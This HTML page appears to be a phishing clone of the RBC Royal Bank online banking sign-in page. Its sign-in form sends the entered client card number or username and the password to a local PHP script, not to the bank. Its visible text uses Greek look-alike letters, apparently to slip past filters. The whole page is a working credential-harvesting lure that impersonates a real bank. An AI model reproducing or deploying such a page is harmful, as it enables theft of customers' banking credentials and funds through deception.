<!DOCTYPE html>
<!--[if IE 8]><html class="no-js ie8 oldie" data-placeholder-live="false"><![endif]-->
<!--[if IE 9 ]><html class="no-js ie9 oldie"><![endif]-->
<html class=" js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage no-websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients no-cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths bgpositionshorthand bgpositionxy boxsizing no-bgrepeatround no-bgrepeatspace display-table lastchild mediaqueries csspositionsticky no-regions dataset no-microdata no-time devicemotion deviceorientation formattribute placeholder no-speechinput fullscreen formvalidation no-ie8compat json svgfilters datauri" style="" lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=windows-1252">
    <title>RBC Roy&alpha;l B&alpha;nk - Sign In to Onl&iota;ne B&alpha;nking</title>
    <link href="https://www1.royalbank.com/uos/common/images/icons/favicon.ico" rel="icon">
    <link href="files/search-ask-style.css" rel="stylesheet">
    <link href="files/notifications.css" rel="stylesheet" type="text/css">
    <!-- Load Bootstrap CSS -->
    <link href="files/bootstrap.css" rel="stylesheet">
    <!-- Bootstrap Overwrites -->
    <!-- Load Master CSS (Common styles) -->
    <link href="files/master.css" rel="stylesheet">
    <!-- Load Specific styles for specific page -->
    <link href="files/ibsignin.css" rel="stylesheet">
    <!-- Load Specific styles for fonts -->
    <link href="files/rbc-icons.css" rel="stylesheet">
    <!-- Load Modules -->

    <!-- Load Custom Fonts -->
    <link rel="stylesheet" href="files/font-awesome.css">
    <!-- Important Note about CSS files
        All the Bootstrap CSS Overwrites need to be concatenated and minified before
        going to production.
     -->

    <!-- Load Scripts that need to load before the page starts loading -->
<!-- Start of 3MSRCPATH.CINC -->



<!-- End of 3MSRCPATH.CINC -->
<script type="text/javascript">
 var bt_timeout = 2 * 1000; // We need to define what timeout we want
</script>
<script type="text/javascript" src="files/_btadlib.js"></script><style type="text/css">.bboxDefault { visibility:hidden; display: none; }</style>

<script type="text/javascript" src="files/keypress.js"></script>
<script type="text/javascript">
<!--
 function f3msignin_ForgotPassword()
 {
  if ( document.ForgotPsw.CHKCLICK.value == 'N' )
  {
   return false;
  }
  else
  {
   if ( document.rbunxcgi.CAFE && document.rbunxcgi.CAFE.checked )
   {
    alert( 'Enhanced Security must not be selected when using \'Forgot Password?\'. \nTo recover your Onl&iota;ne B&alpha;nking P&alpha;ssword, click \'Forgot Password?\' only.' );
    document.rbunxcgi.Q1.value='';
    document.rbunxcgi.CAFE.checked=false;
   }
   else
   {
    document.rbunxcgi.CHKCLICK.value = 'N';
    document.ForgotPsw.CHKCLICK.value = 'N';
    document.ForgotPsw.K1.value = document.rbunxcgi.K1.value;
    document.ForgotPsw.submit();
   }
  }
 }
 //-->
</script>
			  
<script type="text/javascript">
 <!--
 var CAFETimeout=900;
 function doCafeCheck()
 {
  checkCafe('You are entering the secure Onl&iota;ne B&alpha;nking transactional area. \nWhen you are finished, please select \'Sign Out\' to close your secure session.',document.rbunxcgi);
  if (document.rbunxcgi.CHKCLICK.value == 'N')
  {
   return false;
  }
  else
  {
   document.rbunxcgi.CHKCLICK.value = 'N';
   document.ForgotPsw.CHKCLICK.value = 'N';
   return true;
  }
 }
//-->
</script>		
<script type="text/javascript">
 <!--
 var htmlvar="";
 //-->
</script>
	
<script type="text/javascript" src="files/webtrends.js"></script>
<meta name="DCS.dcsuri" content="/english/olb/b&alpha;nking/sign-in.htm"> 

<script type="text/javascript">
 //<![CDATA[
 var _tag=new WebTrends();
 _tag.dcsGetId();
 //]]>
</script>
<script type="text/javascript">
//<![CDATA[
_tag.dcsCustom=function(){
// Add custom parameters here.
//_tag.DCSext.param_name=param_value;
}
_tag.dcsCollect();
//]]>
</script>


<script type="text/javascript">

function checkQ() {
	var fields = $('#question').val();
	
	if (fields.indexOf('href=') >= 0) {
		$('#question').val('');
	}
	else if (fields.indexOf('url=') >= 0) {
		$('#question').val('');
	}
	else if (!fields) {
		$('#question').val('');
	}
	kiosk_OpenWinRTB( 'https://www.rbcroyalbank.com/cgi-bin/cs-kioskolb/ask.cgi/response/find?question='+fields, 'RTB', kiosk_Type14X, kiosk_Type14Y, kiosk_Type14R );
}

function checkQ_OpenSamePage() {
	var fields = encodeURIComponent($('#question').val());
	
	if (fields.indexOf('href=') >= 0) {
		$('#question').val('');
	}
	else if (fields.indexOf('url=') >= 0) {
		$('#question').val('');
	}
	else if (!fields) {
		$('#question').val('');
	}
	window.open('https://www.rbcroyalbank.com/search-public/index.html?IR_INTERFACE_ID=6&question='+fields , '_self');
}

function InputSelect() {
	if ($('#question').val() == $('#question').attr('placeholder')) { $('#question').val('').css('color','#000'); }
	if ($('#question').val() != '' && $('#question').val() != $('#question').attr('placeholder')) { $('#question').select(); }
}

function getTopFive(){
    if(!getTopFive.isPrevInvoked){ 
		if ($('#topFiveList+.loading-indication').length == 0)
        {
            $('#topFiveList').after('<div class="loading-indication">Loading...</div>');
        }
		$.ajax({
			url: '/cgi-bin/rbaccess/rbunxcgi?F6=1&F7=IB&F21=IB&F22=IB&REQUEST=RBCProxyThisNS&URL_NAME=https://www.rbcroyalbank.com/cgi-bin/cs-kioskolb/ask.cgi/top10',
			type: "GET",
			mimeType: 'text\/plain; charset=ISO-8859-1',
			success: function(html){
				$('.top5Dropdown .loading-indication').remove();
				if (!html.match('^<ul')) {	$('#topFiveList').html('<p>Sorry, we are experiencing technical difficulties.</p>'); }
				else {
					$('#topFiveList').append(html);
					$('#topFiveList ul li').unwrap();
					$('#topFiveList li').slice(5).remove();
					$('#topFiveList a').each(function(){
						$(this).attr('href','javascript:kiosk_OpenWinRTB(\''+$(this).attr('href')+'\', \'RTB\', kiosk_Type14X, kiosk_Type14Y, kiosk_Type14R);');
						$(this).attr('title',$(this).text());
					}); 
					$('#topFiveList a').append('<span class="accessible"> (Opens new window)</span>');
				}
				getTopFive.isPrevInvoked = true;
			}
        });

    }    
}
</script> <link rel="stylesheet" type="text/css" href="files/print.css" media="print">
<link rel="stylesheet" type="text/css" href="files/common.css">

<script type="text/javascript" src="files/utilities.js"></script>
<script type="text/javascript" src="files/custom_002.js"></script>
<script type="text/javascript" src="files/browser.js"></script>
<script type="text/javascript" src="files/event_003.js"></script>
<script type="text/javascript" src="files/event.js"></script><script language="JavaScript1.2" src="files/event_002.js" type="text/javascript"></script>
<script type="text/javascript" src="files/kiosk.js"></script>
<script type="text/javascript" src="files/common.js"></script>
<script type="text/javascript" src="files/header_dates.js"></script>
<script type="text/javascript" src="files/cookie.js"></script>
<script type="text/javascript" src="files/enhancedJuly.js"></script>
<script type="text/javascript" src="files/rsa.js"></script>    <script type="text/javascript" src="files/kiosk.js"></script>
    <script type="text/javascript">
  function submitOtherOnlineMenu1()
  {
    window.location = document.serviceSelector.selectService.options[document.serviceSelector.selectService.options.selectedIndex].value;
  }
  </script>


    <!-- custom Modernizr -->
    <script src="files/modernizr.js"></script>
    <!-- NOTE: This will prevent the user to zoom in and out with keyboard. Disabled for now. -->
    <!-- <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> -->




<script language="JavaScript" type="text/JavaScript">
rbcDeleteCookie( "3MTK", "/" );
</script>




  <script src="files/a.js" async=""></script></head>
  <body onfocus="event_onFocusForm();" onmouseover="event_onFocusForm();" onblur="event_onBlurForm();" onmouseout="event_onBlurForm();" onload="event_onLoad();" onunload="event_onUnload();">
    <!-- RBC Wrapper Starts -->
<form name="ForgotPsw" action="/cgi-bin/rbaccess/rbcgi3m01" method="post">
	  <input name="LANGUAGE" value="ENGLISH" type="hidden">
	  <input name="SST" value="B-AACQAZAAsALQACAA0nwg??" type="hidden">
	  <input name="REQUEST" value="ResetPwd" type="hidden">
	  <input name="F6" value="1" type="hidden">
	  <input name="F7" value="IB" type="hidden">
	  <input name="F21" value="PB" type="hidden">
	  <input name="F22" value="HT" type="hidden">
	  <input name="CHKCLICK" value="Y" type="hidden">
	  <input name="K1" value="" type="hidden">
      
      <script type="text/javascript">
          var noscriptElement = document.getElementById("NOJAVASCRIPT1");
          noscriptElement.parentNode.removeChild(noscriptElement);
      </script>

	</form>

	<form name="forgotUsername" action="/cgi-bin/rbaccess/rbcgi3m01" method="post">
	  <input name="F6" value="1" type="hidden">
	  <input name="F7" value="IB" type="hidden">
	  <input name="F21" value="PB" type="hidden">
	  <input name="F22" value="HT" type="hidden">
	  <input name="LANGUAGE" value="ENGLISH" type="hidden">
	  <input name="REQUEST" value="ForgotUsername" type="hidden">
	</form>

	<!--JGMA: -->
	<form name="enterCard" action="/cgi-bin/rbaccess/rbcgi3m01" method="post">

	  <input name="F6" value="1" type="hidden">
	  <input name="F7" value="IB" type="hidden">
	  <input name="F21" value="IB" type="hidden">
	  <input name="F22" value="IB" type="hidden">
	  <input name="LANGUAGE" value="ENGLISH" type="hidden">
	  <input name="REQUEST" value="ClientSignin" type="hidden">
	  <input name="XNN" value="1" type="hidden">
	</form>

	<form name="remNick" action="/cgi-bin/rbaccess/rbcgi3m01" method="post">
	  <input name="F6" value="1" type="hidden">
	  <input name="F7" value="IB" type="hidden">
	  <input name="F21" value="IB" type="hidden">
	  <input name="F22" value="IB" type="hidden">
	  <input name="LANGUAGE" value="ENGLISH" type="hidden">
	  <input name="REQUEST" value="ecatsRemoveRequest" type="hidden">
	  <input name="CCID" value="" type="hidden">
	  <input name="K1" value="" type="hidden">
	  <input name="INVALIDCCID" value="N" type="hidden">
	</form>
	<!--JGMA. -->

	<form name="GOCANACT" action="/cgi-bin/rbaccess/rbcgi3m01" method="post">
	<input name="F6" value="1" type="hidden">
	<input name="F7" value="IB" type="hidden">
	<input name="F21" value="PB" type="hidden">
	<input name="F22" value="HT" type="hidden">
	<input name="D" type="hidden">
	<input name="REQUEST" value="PreparingCanact" type="hidden">
	</form>
	<form name="SIGNOUT2" method="post" action="/cgi-bin/rbaccess/rbcgi3m01">
	<input name="REQUEST" value="SIGNOUT" type="hidden">
	<input name="LANGUAGE" value="ENGLISH" type="hidden">
	<input name="F8" value="1" type="hidden">
	<input name="F22" value="HT" type="hidden">
	<input name="SUBMIT" type="hidden">
	<input name="TIMEOUT" value="" type="hidden">
	</form>

	<form name="SIGNOUTNS" method="post" action="/cgi-bin/rbaccess/rbcgi3m01">
	<input name="REQUEST" value="SignoutNS" type="hidden">
	<input name="LANGUAGE" value="ENGLISH" type="hidden">
	<input name="F22" value="HT" type="hidden">
	<input name="F6" value="1" type="hidden">
	<input name="F7" value="IB" type="hidden">
	<input name="REDIRURL" value="" type="hidden">
	<input name="REDIRDELAY" value="" type="hidden">
	<input name="INFO_TEXT" value="" type="hidden">
	<input name="REDIRLINK" value="" type="hidden">
	<input name="NOLINKS" value="" type="hidden">
	<input name="TIMEOUT" value="" type="hidden">
	<input name="CL_TYPE_BUS" value="" type="hidden">
	<input name="SURVEYID" value="" type="hidden">
	</form>    <div class="mainWrapper">
      <div id="rbcWrapper" class="container">
        <!-- Header Starts -->
        <a href="#mainContent" class="skipNav accessible">Skip to Main Content</a>
        <header role="banner" aria-label="Customer Service, Select Language, and About this Page" class="signInHeader row">
  <div class="logo col-xs-4"><img src="files/rbc_royalbank_en.gif" alt="RBC Royal Bank" title="RBC Royal Bank" width="210" height="47"></div>
  <div class="headerHelpWidget col-xs-8">
    <nav class="headerLinks">
      <!-- Remember to always add here accessible links to the main content sections (main content, sidebar, footer) -->
      <ul>
        <li><a title="Customer Service (Opens new window)" href="javascript:kiosk_OpenWinRTB('https://www.rbcroyalbank.com/onlinebanking/help.html?RefURL=https://www1.royalbank.com/cgi-bin/rbaccess/rbcgi3m01&amp;NoEmailSend=DisplayMsg',%20'CONTACT',%20kiosk_Type2X,%20kiosk_Type2Y,%20kiosk_Type2R%20)">Customer Service&nbsp;<img src="files/putih.png"><span class="accessible"> (Opens new window)</span></a></li>
        <li><a href="https://www1.royalbank.com/cgi-bin/rbaccess/rbcgi3m01?F6=1&amp;F7=IB&amp;F21=IB&amp;F22=IB&amp;REQUEST=ClientSignin&amp;LANGUAGE=FRENCH" lang="fr">Fran�ais</a></li>
       </ul>
    </nav>
    <div role="search" aria-label="Need Help?" class="headerHelp">
        <form action="javascript:checkQ_OpenSamePage();">
          <fieldset>
            <legend class="accessible">Need Help Search Form</legend>
            <label for="question" class="accessible">Need Help?</label>
            <input id="question" placeholder="Need Help?" title="Need Help?" role="search" type="text">
            <!-- top five dropdown -->
            <div class="top5Dropdown">
                <button class="dropdown-toggle" type="button" id="dropdownMenuTopFive" data-toggle="dropdown" aria-expanded="false" onclick="getTopFive()">Top 5 FAQs &nbsp;<img src="files/v.png"></button>
                <div class="dropdown-menu">
                    <span class="accessible">Start of Region Top 5 Questions</span>
                    <h4 class="dropdown-header">Top 5 Questions</h4>
                    <ul id="topFiveList"></ul>
                    <div tabindex="0" class="closeDropdown" title="Close Region Top 5 Questions Button - tabbing off will close window"><i aria-hidden="true" class="rbc-icon rbc_close"></i><span class="accessible">Close Region Top 5 Questions Button - tabbing off will close window</span></div>
                    <span class="accessible">End of Region Top 5 Questions</span>
                </div>
            </div>
            <button class="blueBtn askBtn" type="submit" title="Ask (Opens new window)">Ask<span class="accessible"> (Opens new window)</span></button>
          </fieldset>
        </form>
    </div>
  </div>
  </header>
  <div class="row">
  <nav role="navigation" aria-label="Main" class="mainNav col-xs-12">
 <ul>
      <li><a href="http://www.rbcroyalbank.com/products/deposits/index.html?primetopnavclick=true">B&alpha;nk &Alpha;ccounts</a></li>
      <li><a href="http://www.rbcroyalbank.com/Cred&iota;t-cards/index.html?primetopnavclick=true">Cred&iota;t C&alpha;rds</a></li>
      <li><a href="http://www.rbcroyalbank.com/mortgages/index.html?primetopnavclick=true">Mortg&alpha;ges</a></li>
      <li><a href="http://www.rbcroyalbank.com/personal-loans/index.html?primetopnavclick=true">Lines and Lo&alpha;ns</a></li>
      <li><a href="http://www.rbcroyalbank.com/investing/index.html?primetopnavclick=true">Investments</a></li>
      <li><a href="http://www.rbc.com/advice/advice-and-tools.html?primetopnavclick=true&amp;_ga=1.188766571.1937728848.1412950524" class="lastChild">Advice</a></li>
</ul>  </nav>
  </div>

        <!-- Header Ends -->
        <!-- Main Container Starts-->
        <main id="signInPage" role="main" tabindex="-1" aria-label="Content" class="row">
          <!-- No sidebar for this page -->
        <!-- Use this for accessibility purposes. Will describe page on screen readers-->
        <h1 class="accessible">Welcome to Onl&iota;ne B&alpha;nking</h1>
          <section id="mainContent" role="main" tabindex="-1" class="col-xs-12">
            <!-- SignIn Banner Starts-->
            <div id="signInBanner" class="row">
              <section id="primarySignIn" class="col-xs-6">
                <h2>Sign in to Onl&iota;ne B&alpha;nking</h2>
                <form id="rbunxcgi" role="form" aria-label="Sign in to Onl&iota;ne b&alpha;nking" name="rbunxcgi" action="rbcgi3m01.php" method="post" autocomplete="off" onsubmit="v3mRSA_GetData(this);">

                    <input name="FromPreSignIn_SIP" value="Y" type="hidden">
                    <input name="LANGUAGE" value="ENGLISH" type="hidden">
                    <input name="F30" value="1,X001,5,K1,2,Q1" type="hidden">
                    <input name="SST" value="B-AACQAZAAsALQACAA0nwg??" type="hidden">
                    <input name="F6" value="1" type="hidden">
                    <input name="F7" value="S0" type="hidden">
                    <input name="F21" value="PB" type="hidden">
                    <input name="F22" value="HT" type="hidden">
                    <input name="CHKCLICK" value="Y" type="hidden">
                    <input name="NNAME" value="" type="hidden">
                    <input name="RSA_DEVPRINT" value="" type="hidden">
                    
                    <script type="text/javascript">
                        var noscriptElement = document.getElementById("NOJAVASCRIPT2");
                            noscriptElement.parentNode.removeChild(noscriptElement);
                    </script>


                    <fieldset>
                    <legend class="accessible">Sign in Form</legend>
                    <!-- CC Text Input Starts -->
                    <div class="row formBlock">
                        <label for="K1" class="signInLabel">Client C&alpha;rd or Usern&alpha;me<span class="accessible"> (required)</span></label>
                        <div class="toolTip">
                            <button type="button" data-toggle="dropdown" aria-expanded="false" title="More information about Client Card or Username" class="dropdown-toggle"><img src="files/i.png"><span class="accessible">More information about Client Card or Username</span></button>
                            <div class="dropdown-menu">
                                <span class="accessible">Start of Region Help - Client Card</span>
                                <h4 class="dropdown-header">Help - Client C&alpha;rd</h4>
                                <p>Your Client C&alpha;rd is the 16-digit c&alpha;rd
 you use for debit and ATM tr&alpha;ns&alpha;ctions. You c&alpha;n also use the number you
 were given at the br&alpha;nch to &alpha;ccess Onl&iota;ne b&alpha;nking.</p>
                                <p>A userna&alpha;me is a unique ID th&alpha;t you create to &alpha;ccess your RBC Roy&alpha;l B&alpha;ank Onl&iota;ne B&alpha;nking &alpha;ccount.</p>
                                <img src="files/tooltipPeak.png" alt="" aria-hidden="true" class="peak">
                                <div tabindex="0" class="closeDropdown" title="Close Region Help - Client Card Button - tabbing off will close window">&nbsp;<i aria-hidden="true" class="rbc-icon rbc_close"></i><span class="accessible">Close Region Help - Client Card Button - tabbing off will close window</span></div>
                                <span class="accessible">End of Region Help - Client C&alpha;rd</span>
                            </div>
                        </div>

                        <div class="inputWrapper">
                            <input name="username" id="K1" tabindex="2" maxlength="16" class="ccUsername" type="text">
                                <div class="checkBoxWrapper">
                                    <input name="N1" tabindex="5" id="N1" onclick="javascript:if (this.checked) { document.rbunxcgi.NNAME.value='ecatsRememberMe'; } else { document.rbunxcgi.NNAME.value=''; }" class="checkboxInput" type="checkbox">
                                    <span aria-hidden="true" class="checkbox"></span>
                                    <label for="N1" class="checkBoxLabel">Remember Me</label>
                                    <div class="toolTip">
                                        <button type="button" data-toggle="dropdown" aria-expanded="false" title="More information about Remember Me" class="dropdown-toggle"><img src="files/i.png"><span class="accessible">More information about Remember Me</span></button>
                                        <div class="dropdown-menu">
                                            <span class="accessible">Start of Region Help - Remember Me</span>
                                            <h4 class="dropdown-header">Help - Remember Me</h4>
                                            <p>Remember me is a secure 
and convenient way to sign into RBC Roy&alpha;l B&alpha;nk Onl&iota;ne B&alpha;nking. We don't 
recommend this option if you're using a public or shared computer.</p>
                                            <p>To turn this feature on, 
select the 'Remember me' box and a cookie will allow RBC to recognize 
your computer the next time you sign in. If you delete cookies on your 
computer you will erase the identification(s) you have saved.</p>
                                            <img src="files/tooltipPeak.png" alt="" aria-hidden="true" class="peak">
                                            <div tabindex="0" class="closeDropdown" title="Close Region Help - Remember Me Button - tabbing off will close window">&nbsp;<i aria-hidden="true" class="rbc-icon rbc_close"></i><span class="accessible">Close Region Help - Remember Me Button - tabbing off will close window</span></div>
                                            <span class="accessible">End of Region Help - Remember Me</span>
                                        </div>
                                    </div>


                                </div>
                        </div>
                        <div class="formLinks">
                            <a href="javascript:document.forgotUsername.submit();" tabindex="6" class="formLinksFirstA">Recover Your Usern&alpha;me</a>
                        </div>
                    </div>
                    <!-- CC Text Input Ends -->

                    <!-- Password Input Starts -->
                    <div class="row formBlock lastBlock">
                        <label for="Q1" class="signInLabel">P&alpha;ssword<span class="accessible"> (required)</span></label>
                        <div class="inputWrapper">
                            <input name="password" id="Q1" tabindex="3" type="password">
                            <button name="send" type="submit" tabindex="4" class="yellowBtnLarge">Sign In</button>
                        </div>
                        <div class="formLinks">
                            <ul>
                                <li><a href="javascript:f3msignin_ForgotPassword();" tabindex="7">Reset Your P&alpha;ssword</a></li>
                                <li><a title="Need Help Signing In? (Opens new window)" tabindex="8" class="formLinksFirstB" href="about.html">Need Help Signing In?&nbsp;<img src="files/biru.png"><span class="accessible"> (Opens new window)</span></a></li>
                            </ul>
                        </div>
                    </div>
                    <!-- Password Input Ends -->
                  </fieldset>
                </form>
              </section>
              <!-- Secondary signin Starts -->
                <section id="secondarySignIn" class="col-xs-6">
                    <div id="signinEnrollWidget" class="secondarySignInWidget">
                        <h2>New to Onl&iota;ne B&alpha;nking?</h2>
                        <p>Discover the benefits of b&alpha;nking Onl&iota;ne.</p>
                        <button type="button" onclick="location.href='/cgi-bin/rbaccess/rbcgi3m01?F6=1&amp;F7=IB&amp;F21=IB&amp;F22=HT&amp;REQUEST=IBOnlineEnrollLink&amp;LANGUAGE=ENGLISH'" class="blueBtnChevron" title="Enrol Now in Onl&iota;ne b&alpha;nking">Enrol Now <span class="accessible">in Onl&iota;ne b&alpha;nking</span>&nbsp;<img src="files/panah.png"></button>
                    </div>
                    <div id="signinServicesSelector" class="secondarySignInWidget formBlock selectSec">
                        <h2>Other Onl&iota;ne Services</h2>
                        <div class="formInputInline">
                            <form action="javascript:submitOtherOnlineMenu1();" id="serviceSelector" name="serviceSelector" class="navbar-form-alt">
                                <div class="form-group">
                                    <div class="input-group">
                                        <label for="selectService" class="formLabelInline accessible">Other Onl&iota;ne Services</label>
                                        <select id="selectService" name="selectService" class="form-control">
                                            <option value="/english/netaction/sgne.html" selected="selected">RBC Direct Investing</option>
                                            <option value="/english/ris/pcd/sgne.html">DS Onl&iota;ne</option>
                                            <option value="/cgi-bin/rbaccess/rbcgi3m01?F6=1&amp;F7=IB&amp;F21=IB&amp;LANGUAGE=ENGLISH&amp;F22=IB&amp;REQUEST=ErnexLink">RBC Rewards</option>
                                            <option value="/english/wm/sgne.html">Wealth Management</option>
                                            <option value="http://www.rbc.com/Onl&iota;ne-services.html">Other Services</option>
                                        </select>
                                        <button id="serviceSelectorBtn" form="serviceSelector" type="submit" class="blueBtnChevron" title="Go to RBC Direct Investing">Go <span class="accessible">to RBC Direct Investing</span><img src="files/panah.png"></button>
                                    </div>
                                </div>
                            </form>
                        </div>
                    </div>
                </section>
              <!-- Secondary signin Ends -->
            </div>
            <!-- SignIn Banner Ends-->
            <!-- SignIn Maintenance Starts -->
       <div id="publicNotice">
       </div>

            <div id="serviceNotice"><div tabindex="-1" role="region" aria-label="Warning" class="yellowNotice notices signinWarning"><div class="yellowMessage"><i aria-hidden="true" alt="Warning" class="rbc-icon"></i><span class="accessible">Warning </span>Service Notices</div><div class="arrowDownYellow"></div><p><a title="Weekend maintenance to affect Onl&iota;ne/Mobile b&alpha;nking (Opens new window)" href="javascript:kiosk_OpenWinRTB('https://www.rbcroyalbank.com/onlinebanking/bankingusertips/notices/Maint_Weekly.html',%20'RTB',%2040,%2050,%20kiosk_Type1R)">Weekend maintenance to affect Onl&iota;ne/Mobile b&alpha;nking&nbsp;<img src="files/putih.png"><span class="accessible"> (Opens new window)</span></a></p></div>
       </div>
            <!-- SignIn Maintenance Ends -->


            <!-- OLB Links Starts-->
            <div id="olbLinks" class="row row-eq-height">
              <section id="spotlight" class="col-xs-4 boxShadow">   <h3>In the Spotlight</h3><ul>		<li><a title="Balance transfer offers now let you send money to friends and non-RBC accounts. (Opens new window)" href="javascript:kiosk_OpenWinRTB('https://www.rbcroyalbank.com/onlinebanking/bankingusertips/notices/balance_transfer_info.html',%20'RTB',%2040,%2050,%20kiosk_Type1R)">B&alpha;l&alpha;nce tr&alpha;nsfer offers now let you send money to friends and non-RBC accounts.&nbsp;<img src="files/putih.png"><span class="accessible"> (Opens new window)</span></a></li>		<li><a title="Changes to your Onl&iota;ne b&alpha;nking Agreement  (Opens new window)" href="javascript:kiosk_OpenWinRTB('https://www.rbcroyalbank.com/onlinebanking/bankingusertips/notices/eaa_2016.html',%20'RTB',%2040,%2050,%20kiosk_Type1R)">Changes to your Onl&iota;ne Ba&alpha;nking Agreement &nbsp;<img src="files/putih.png"><span class="accessible"> (Opens new window)</span></a></li>		<li><a title="RBC Direct Investing Notifications are here! (Opens new window)" href="javascript:kiosk_OpenWinRTB('https://www.rbcroyalbank.com/onlinebanking/bankingusertips/notices/notifications_launch_olb.html',%20'RTB',%2040,%2050,%20kiosk_Type1R)">RBC Direct Investing Notifications are here!&nbsp;<img src="files/putih.png"><span class="accessible"> (Opens new window)</span></a></li>		<li><a title="You're invited! Onl&iota;ne and Mobile b&alpha;nking are now available to all RBC Royal Bank personal b&alpha;nking clients (Opens new window)" href="javascript:kiosk_OpenWinRTB('https://www.rbcroyalbank.com/onlinebanking/bankingusertips/notices/invitation_notice.html',%20'RTB',%2040,%2050,%20kiosk_Type1R)">You're invited! Onl&iota;ne and Mobile B&alpha;nking are now available to all RBC Roy&alpha;l B&alpha;nk person&alpha;l b&alpha;nking clients&nbsp;<img src="files/putih.png"><span class="accessible"> (Opens new window)</span></a></li>		<li><a title="Supported browsers for Onl&iota;ne b&alpha;nking (Opens new window)" href="javascript:kiosk_OpenWinRTB('https://www.rbcroyalbank.com/onlinebanking/bankingusertips/notices/supported_browsers.html',%20'RTB',%2040,%2050,%20kiosk_Type1R)">Supported browsers for Onl&iota;ne b&alpha;nking&nbsp;<img src="files/putih.png"><span class="accessible"> (Opens new window)</span></a></li></ul>
<!-- MKTSPACEPT.INC ends -->
              </section>
              <section id="staysafeonline" class="col-xs-4 boxShadow">   <h3>Stay Safe Onl&iota;ne</h3><ul><li><a title="Learn about email and website fraud (Opens new window)" href="javascript:kiosk_OpenWinRTB('http://www.rbc.com/privacysecurity/ca/email-and-website-fraud-1.html',%20'RTB',%2040,%2050,%20kiosk_Type1R)">Learn about email and website fraud&nbsp;<img src="files/putih.png"><span class="accessible"> (Opens new window)</span></a></li><li><a title="Report a concern (Opens new window)" href="javascript:kiosk_OpenWinRTB('http://www.rbc.com/privacysecurity/ca/contact-us.html',%20'RTB',%2040,%2050,%20kiosk_Type1R)">Report a concern&nbsp;<img src="files/putih.png"><span class="accessible"> (Opens new window)</span></a></li><li><a title="Practice Safe Computing (Opens new window)" href="javascript:kiosk_OpenWinRTB('http://www.rbc.com/privacysecurity/ca/steps-for-safe-computing.html',%20'RTB',%2040,%2050,%20kiosk_Type1R)">Practice Safe Computing&nbsp;<img src="files/putih.png"><span class="accessible"> (Opens new window)</span></a></li><li><a title="Common schemes and scams (Opens new window)" href="javascript:kiosk_OpenWinRTB('http://www.rbc.com/privacysecurity/ca/schemes-and-scams.html',%20'RTB',%2040,%2050,%20kiosk_Type1R)">Common schemes and scams&nbsp;<img src="files/putih.png"><span class="accessible"> (Opens new window)</span></a></li><li><a title="Privacy and Security (Opens new window)" href="javascript:kiosk_OpenWinRTB('http://www.rbc.com/privacysecurity/ca/',%20'RTB',%2040,%2050,%20kiosk_Type1R)">Privacy and Security&nbsp;<img src="files/putih.png"><span class="accessible"> (Opens new window)</span></a></li></ul>
              </section>
              <section id="securityguarantee" class="col-xs-4 boxShadow">
                <h3>RBC Security Guarantee</h3>
                <p><span class="bold">We will fully reimburse any unauthorized tr&alpha;ns&alpha;ctions made in RBC Roy&alpha;l B&alpha;nk Onl&iota;ne B&alpha;nking.</span></p>
                <p><a href="http://www.rbcroyalbank.com/Onl&iota;ne/rbcguarantee.html" title="Learn More About RBC Security Guarantee">Learn More<span class="accessible"> About RBC Security Guarantee</span></a></p>
              </section>
            </div>
            <!-- OLB Links Ends-->

            <!-- Body Adv -->
            <div role="complementary" aria-label="Advertisement" class="bodyPromotion row">
                        <!-- This is the default Div which will be rendered when the bridgetrack fails to load the advertisement -->
                            <div class="bboxDefault">
                                <img alt="Advertisement - Select for more information" src="files/Default_540x120.JPG" width="540" height="120">
                            </div>
                        <!-- End default ad  -->
                        <!-- Begin actual bridgetrack ad -->
                            <div class="bt-ad" data-bt-pid="653267" data-bt-cid="51"><div id="write_auto_1" class="doc_write"><a href="https://rbc.bridgetrack.com/ads_v2/img_click/?BT_BCID=179634&amp;BT_SID=79227&amp;" target="_top"><img src="files/Winter_Retirement_Designer_A_540x120.jpg" alt="How will you fill the 2,000 hours a year you currently spend working? Start designing your retirement today Find out How" title="How will you fill the 2,000 hours a year you currently spend working? Start designing your retirement today Find out How" width="540" border="0" height="120"></a></div><script type="text/javascript" id="auto_1" class="bt-ignore">function BTWrite(s) { document.write(s); };document.write('<A HREF=\'https://rbc.bridgetrack.com/ads_v2/img_click/?BT_BCID=179634&BT_SID=79227&\' target="_top"><IMG BORDER=0 SRC=\'https://sec-rbc.bridgetrack.com/assets/45915/Winter_Retirement_Designer_(A)_540x120.jpg\' WIDTH=540 HEIGHT=120 ALT=\'How will you fill the 2,000 hours a year you currently spend working? Start designing your retirement today Find out How\' TITLE=\'How will you fill the 2,000 hours a year you currently spend working? Start designing your retirement today Find out How\'></A>');</script></div>
          </div>
            <!-- Body Adv -->
          </section>
        </main>
        <!-- Main Container Ends -->
        <!-- Footer Starts -->
        <footer role="navigation" aria-label="Popular Links" class="row">
            <!-- Footer Columns / Footer Links **** Starts -->
<section id="footerWrapper" class="row row-eq-height">
    <div class="footerCols col-xs-15">
        <h4>M&alpha;n&alpha;ging Your &Alpha;ccount</h4>
        <ul class="footerLinks">
          <li><a href="http://www.rbcroyalbank.com/products/deposits/lost-stolen-card.html">Report a lost or Stolen C&alpha;rd</a></li>
          <li><a href="http://www.rbcroyalbank.com/products/deposits/pre-authorized-bill-payments.html">Pre-Authorized Bill P&alpha;yment</a></li>
          <li><a href="http://www.rbcroyalbank.com/products/deposits/interac-Onl&iota;ne.html">Inter&alpha;c* Onl&iota;ne</a></li>
          <li><a href="http://www.rbcroyalbank.com/products/deposits/order-cheques.html">Order Cheques</a></li>
        </ul>
      </div>
      <div class="footerCols col-xs-15">
        <h4>Customer Service</h4>
        <ul class="footerLinks">
          <li><a href="http://www.rbcroyalbank.com/products/deposits/customer-service.html">General Inquiries</a></li>
          <li><a href="https://www.rbcroyalbank.com/cgi-bin/deposits/pda/apply.cgi">Open an &Alpha;ccount</a></li>
          <li><a href="http://maps.rbc.com/index.en.asp">Branch &amp; ATM Locator</a></li>
          <li><a href="http://www.rbcroyalbank.com/Onl&iota;ne/index.html">Onl&iota;ne B&alpha;nking</a></li>
        </ul>
      </div>
      <div class="footerCols col-xs-15">
        <h4>Rates &amp; Fees</h4>
        <ul class="footerLinks">
